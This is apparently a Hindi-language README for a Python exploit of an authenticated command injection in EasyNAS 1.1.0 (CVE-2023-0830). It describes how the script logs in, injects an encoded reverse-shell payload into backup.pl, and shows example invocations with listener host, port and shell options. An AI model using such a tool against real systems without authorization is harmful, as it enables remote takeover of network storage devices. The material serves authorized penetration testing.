
EasyNAS संस्करण 1.1.0 के लिए शोषण। जिस कमजोरी का शोषण किया गया है वह एक command injection दोष है, जिसके लिए प्रमाणीकरण आवश्यक है।
यह Python स्क्रिप्ट EasyNAS संस्करण 1.1.0 के लिए एक शक्तिशाली शोषण है जिसमें एकीकृत श्रोता सहित उन्नत कार्यक्षमता है। शोषित की गई कमजोरी एक कमांड इंजेक्शन दोष है, जिसके लिए प्रमाणीकरण की आवश्यकता होती है।
स्क्रिप्ट लक्ष्य सर्वर के साथ एक सत्र स्थापित करती है, फिर उपयोगकर्ता द्वारा प्रदान की गई साख के साथ लॉगिन अनुरोध भेजती है। सफल प्रमाणीकरण पर, स्क्रिप्ट एक पेलोड बनाती है, जो निष्पादित होने पर, उपयोगकर्ता द्वारा निर्दिष्ट IP और पोर्ट पर एक रिवर्स शेल कनेक्शन खोलता है। यह पेलोड URL और Base64 एन्कोडेड होता है और फिर एक तैयार किए गए GET अनुरोध के माध्यम से सर्वर पर backup.pl फ़ाइल में इंजेक्ट किया जाता है।
Ivan Spiridonov (xbz0n) https://xbz0n.sh
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin --mode reverse --lhost 192.168.0.100 --lport 4444
--mode {shell,reverse} शोषण मोड: shell (एकीकृत रिवर्स शेल) या reverse (बाहरी श्रोता)
--lhost IP_ADDRESS रिवर्स शेल श्रोता के लिए IP पता (डिफ़ॉल्ट रूप से स्वतः पहचाना जाता है)
--lport PORT रिवर्स शेल श्रोता के लिए पोर्ट (डिफ़ॉल्ट: 4444)
--protocol {http,https} उपयोग करने के लिए प्रोटोकॉल (डिफ़ॉल्ट: https)
--verbose वर्बोज़ आउटपुट सक्षम करें
--shell {bash,sh,python} एकीकृत श्रोता के साथ उपयोग करने के लिए शेल प्रकार निर्दिष्ट करें (डिफ़ॉल्ट: bash)
यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों और अधिकृत पैठ परीक्षण के लिए है। किसी भी नेटवर्क या सिस्टम के खिलाफ पैठ परीक्षण चलाने से पहले हमेशा स्पष्ट अनुमति लें।
कृपया जिम्मेदारी से उपयोग करें।